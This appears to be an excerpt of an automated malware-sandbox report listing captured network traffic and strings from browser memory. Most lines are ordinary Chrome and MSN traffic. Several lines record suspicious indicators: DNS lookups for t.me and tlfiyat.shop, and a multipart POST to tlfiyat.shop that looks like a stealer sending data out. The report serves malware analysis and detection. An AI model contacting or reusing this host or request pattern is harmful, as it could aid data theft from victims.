Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_social-data-service_dist_service_SocialService_js.d0196b6bd9fdaa9d5a17.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_super-feed_dist_feed-manager_FeedManagerWithClientAd_js.dcd038378840e752a33e.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: ff6a6aa9-b5a5-43f5-954c-b3c7085a243c.tmp.26.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820504438.0000203400D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2736084867.0000203400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2736169387.0000203400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2736237918.0000203400454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style 
include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000013.00000002.2827197419.0000203401B30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2767897495.0000203401B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827261354.0000203401B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca= 4 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000003.2767897495.0000203401B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2827261354.0000203401B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2767988556.0000203401B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819353678.0000203400C54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820323001.0000203400D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826886665.0000203401B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2826886665.0000203401B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820504438.0000203400D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/ 4 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000013.00000002.2820504438.0000203400D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: OMTkTMNzXANwD.OMTkTMNzXANwD
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tlfiyat.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic DNS traffic detected: DNS query: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: sb.scorecardresearch.com
Source: unknown DoH DNS queries detected: name: sb.scorecardresearch.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: r.msftstatic.com
Source: unknown DoH DNS queries detected: name: browser.events.data.msn.com
Source: unknown DoH DNS queries detected: name: browser.events.data.msn.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----iw479riw47g4e3w4eu37User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Access-Control-Allow-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigrated,DDD-TMPL-Removed,deviceFeatures,Server-Timing,DDD-LocationAssignedAccess-Control-Expose-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigrated,DDD-TMPL-Removed,deviceFeatures,Server-Timing,DDD-LocationAssignedDDD-AuthenticatedWithJwtFlow: FalseDDD-UserType: AnonymousMuidDDD-StrategyExecutionLatency: 00:00:00.0017423,00:00:00.0018885DDD-ActivityId: 812adf43-b823-4d90-b532-fff661a0f346DDD-TMPL-Removed: FalseDDD-DebugId: 812adf43-b823-4d90-b532-fff661a0f346|2025-01-23T19:40:18.8651661Z|fabric_msn|EUS2-A|News_98DDD-Auth-Features: AT:NA;DID:m-36CB6A348F62672B3E3A7F498E00663A;IT:App;MuidStateOrigin:MuidFromCookieOneWebServiceLatency: 3X-MSEdge-ResponseInfo: 3Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAX-Ceto-ref: 67929b226a6b4776a3e449b3949009ed|AFD:67929b226a6b4776a3e449b3949009ed|2025-01-23T19:40:18.859ZX-MSEdge-Ref: Ref A: 57804B6D80F348E494FD0A6AC8A6D557 Ref B: BL2AA2030103007 Ref C: 2025-01-23T19:40:18ZExpires: Thu, 23 Jan 2025 19:40:18 GMTDate: Thu, 23 Jan 2025 19:40:18 GMTContent-Length: 88Connection: closeSet-Cookie: _C_ETH=1; expires=Wed, 22 Jan 2025 19:40:18 GMT; domain=.msn.com; path=/; secure; httponlySet-Cookie: _C_Auth=Set-Cookie: MUIDB=36CB6A348F62672B3E3A7F498E00663A; expires=Tue, 17 Feb 2026 19:40:18 GMT; path=/; httponlySet-Cookie: _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; domain=.msn.com; path=/; httponlyAlt-Svc: h3=":443"; ma=86400Akamai-Request-BC: [a=23.200.89.146,b=7790077,c=g,n=US_NJ_SECAUCUS,o=20940],[a=131.253.33.203,c=o]
Source: chrome.exe, 00000013.00000002.2814733100.00002034003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818725480.0000203400AD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078ernt
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452er4
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818725480.0000203400AD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000013.00000002.2814733100.00002034003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816414698.0000203400718000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000013.00000002.2814733100.00002034003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816414698.0000203400718000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000013.00000002.2814733100.00002034003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551tch
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000013.00000002.2812568228.0000203400013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816414698.0000203400718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2812568228.0000203400013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815695014.0000203400628000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2881391988.00004D94025A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000013.00000002.2814733100.00002034003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5375er
